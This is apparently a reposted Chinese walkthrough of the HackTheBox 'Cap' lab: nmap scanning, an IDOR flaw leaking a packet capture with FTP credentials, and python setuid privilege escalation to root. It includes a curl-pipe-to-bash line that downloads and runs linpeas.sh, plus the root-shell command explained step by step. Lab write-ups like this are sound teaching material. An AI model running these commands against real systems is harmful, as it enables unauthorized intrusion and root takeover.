【HTB】Cap靶机渗透

admin 2025年3月27日13:39:24评论8 views字数 1191阅读3分58秒阅读模式

该靶机通过信息收集拿到大致信息,利用IDOR访问控制缺陷漏洞获得目标流量包,通过流量分析获取到ftp流量包存在用户名密码,可以ftp登录/ssh登录拿到第一个flag,利用linpeas.sh内网收集工具得到python存在UID提权漏洞,查看ctfobins提权,在/root下发现第二个flag

靶机信息

【HTB】Cap靶机渗透

一、信息收集

执行nmap扫描

nmap -sV -sC -O -T4

开启了21,22,80端口

【HTB】Cap靶机渗透

尝试一下ftp匿名连接,失败

【HTB】Cap靶机渗透

访问80页面

【HTB】Cap靶机渗透

查看该面板,有一个下载

【HTB】Cap靶机渗透

下载查看是一个流量包文件,分析一下没有可用信息

查看ipconfig面板,是ip信息

【HTB】Cap靶机渗透

查看网络状态信息

【HTB】Cap靶机渗透

在都没有得到可用信息时,在第二个面板下载的时候发现url存在参数

【HTB】Cap靶机渗透

二、Web渗透

IDOR-访问控制缺陷漏洞

把下载参数修改为0,发现可以访问下载

【HTB】Cap靶机渗透

分析流量包,发现ftp包存在流量信息,拿到用户名密码

【HTB】Cap靶机渗透

记录下来

# user:nathan
# passwd:Buck3tH4TF0RM3!

ftp登录

【HTB】Cap靶机渗透

发现一个user.txtget下载下来查看,发现第一个flag

【HTB】Cap靶机渗透

这里也可用利用上面的账户密码使用ssh登录,因为在访问web服务时,nothan用户是存在的,即可用利用到ssh

【HTB】Cap靶机渗透

三、提权

查看密码,有bash权限的只有root和nathan,看来还是从该用户入手

【HTB】Cap靶机渗透

因为有了密码,查看可利用命令,无

【HTB】Cap靶机渗透

suid查看一下,没有可以利用的

【HTB】Cap靶机渗透

linpeas.sh-内网自动化信息收集工具

下载地址

https://github.com/peass-ng/PEASS-ng/releases/tag/20250320-91fb36a0

开启web服务,用于上传

【HTB】Cap靶机渗透

靶机使用wget命令下载

【HTB】Cap靶机渗透

赋予权限然后执行

【HTB】Cap靶机渗透

也可以直接从github下载执行

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | bash

最后在此处拿到信息,使用的时候多注意颜色突出的部分,是漏洞利用点

【HTB】Cap靶机渗透

ctfbbins上搜索提权方法

【HTB】Cap靶机渗透

调用python3执行,成功提权

【HTB】Cap靶机渗透

在根目录的root目录下发现flag

【HTB】Cap靶机渗透

成功完成

【HTB】Cap靶机渗透

四、总结

知识点

  • IDOR-访问控制漏洞:
  • linpeas.sh: 一款内网linux的自动化信息收集工具,还有windows版本的
  • python提权: 二进制漏洞利用UID

python提权命令解析

  • python3执行当前目录下的Python解释器(而非系统默认路径的Python)。
  • -c直接执行后续字符串中的Python代码。
  • os.setuid(0)尝试将进程的有效用户ID(EUID)设为0(即root用户)。
  • os.system("/bin/sh")启动一个shell(若上一步成功,此shell将具有root权限)。

任务1-4

【HTB】Cap靶机渗透

任务5-8

【HTB】Cap靶机渗透

原文始发于微信公众号(泷羽Sec-track):【HTB】Cap靶机渗透

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月27日13:39:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【HTB】Cap靶机渗透https://cn-sec.com/archives/3888675.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息